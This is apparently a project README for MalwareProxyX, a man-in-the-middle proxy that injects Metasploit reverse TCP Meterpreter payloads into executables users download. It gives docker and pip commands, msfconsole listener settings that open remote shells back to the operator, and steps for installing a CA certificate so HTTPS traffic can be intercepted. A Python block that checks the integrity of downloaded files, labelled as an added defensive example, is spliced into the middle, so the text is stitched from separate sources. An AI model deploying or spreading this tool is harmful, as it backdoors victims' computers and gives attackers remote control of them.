Real Time Malware Payload Injection In User Binary Downloads Utilising MITM Proxy

darshkpatel/MalwareProxyX

MalwareProxyX

Screenshots

[image: cli output]

[image: usage]

Installation & Usage

Docker Container (Recommended)

Requires:

Installation Steps:

There is no real 'installation' step; just pull the latest pre-built Docker container from the Docker registry:

  • docker pull darshkpatel/malwareproxyx

Usage:

This is the recommended way to use the module.

  • docker run --rm -v $(pwd)/certs/:/root/.mitmproxy -p 8080:8080 darshkpatel/malwareproxyx --payload_host 192.168.1.25

Note: change the --payload_host option to your own machine's IP address or hostname (the host the payload connects back to).

  1. Proxy traffic through YOUR_MACHINES_IP:8080 (8080 is the default port for the proxy server)

  2. MalwareProxyX is configured. All .exe downloads are backdoored using the Metasploit reverse TCP Meterpreter payload.

  3. Start Metasploit Listener

    • Start Metasploit using docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
    • Inside the Metasploit shell:
      • set payload windows/x64/meterpreter/reverse_tcp (remove /x64 for 32-bit payloads)
      • set LPORT 4444 (default port for payload reverse connection in MalwareProxyX: 4444)
      • set LHOST 0.0.0.0
      • exploit -j -i

HTTPS Proxy:

If you need to pass SSL/TLS traffic without certificate errors, you must install the mitmproxy CA certificate in the OS or browser manually.

These certificates can be found in the .mitmproxy directory inside the Docker container.

If you are using the recommended docker command, that directory is already mounted as a certs folder in your current working directory.

These certificates can be copied and installed in the browser or OS of your choice for SSL support.
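The defensive counterpart to what this tool does, as an added example that is not part of MalwareProxyX or the original README: a client-side check that refuses a downloaded .exe whose bytes do not match a SHA-256 hash obtained out of band (vendor page over a separate channel, package manifest), or that is not a well-formed PE image. The sample bytes, the pinned hash and the tampered variant are constructed for the demonstration.

```python
"""Integrity check for a downloaded Windows executable.

Added example, not the project's own code: a proxy that rewrites .exe bodies
in transit is caught by comparing the received bytes against a hash obtained
out of band, and by rejecting anything that is not structurally a PE image.
"""
import hashlib
import struct


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def looks_like_pe(data: bytes) -> bool:
    """True if data has an MZ header whose e_lfanew field points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def verify_download(data: bytes, expected_sha256: str) -> dict:
    """Report hash and structural checks; execute only when both pass."""
    return {
        "hash_ok": sha256_hex(data) == expected_sha256.lower(),
        "pe_ok": looks_like_pe(data),
        "size": len(data),
    }


# Constructed sample: minimal MZ stub with e_lfanew = 0x40 followed by a PE
# signature. Not a real program; it only gives the checks something to run on.
ORIGINAL = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16
# Hash the publisher would list for the genuine file (here computed from the sample).
PINNED_SHA256 = sha256_hex(ORIGINAL)
# Constructed stand-in for a body rewritten in transit: same prefix, extra bytes.
TAMPERED = ORIGINAL + b"\xcc" * 8

if __name__ == "__main__":
    for name, blob in (("original", ORIGINAL), ("tampered", TAMPERED)):
        print(name, verify_download(blob, PINNED_SHA256))
```

Note that the tampered sample still passes the structural check; only the out-of-band hash comparison catches the modification, which is why a hash alone, not the file looking valid, is the signal to trust.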

PyPi Package (Alternate Method, Not Recommended)

I've also published a PyPI package of MalwareProxyX for advanced users who want to use it from other Python scripts or modules; it also provides a CLI command that can be run directly from the command line.

Requires:

  • Python >= 3.7
  • mitmproxy >= 6.0
  • msfconsole >= 6.0

Installation:

pip install MalwareProxyX

Use pip3 if you have multiple versions of pip installed on your system; this package is compatible only with Python 3.

Note: this requires mitmproxy and msfvenom to be installed on the system already.

Usage:

malwareproxyx [-h] [-v] [--host HOST] [--port PORT]
               [--payload_port PAYLOAD_PORT] --payload_host PAYLOAD_HOST
               [--payload_win32 PAYLOAD_WIN32] [--payload_win64 PAYLOAD_WIN64]

Real Time Malware Payload Injection In User Binary Downloads Utilising MITM
Proxy

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         displays the current version of MalwareProxyX
                        (default: False)
  --host HOST           Host address server should bind to (default: 0.0.0.0)
  --port PORT           The port server should bind to (default: 8080)
  --payload_port PAYLOAD_PORT
                        The port used for reverse connection from payload
                        (default: 4444)
  --payload_host PAYLOAD_HOST
                        The host used for reverse connection from payload
                        (default: None)
  --payload_win32 PAYLOAD_WIN32
                        metasploit payload for x86 Binaries (default:
                        windows/meterpreter/reverse_tcp)
  --payload_win64 PAYLOAD_WIN64
                        metasploit payload for x64 Binaries (default:
                        windows/x64/meterpreter/reverse_tcp)
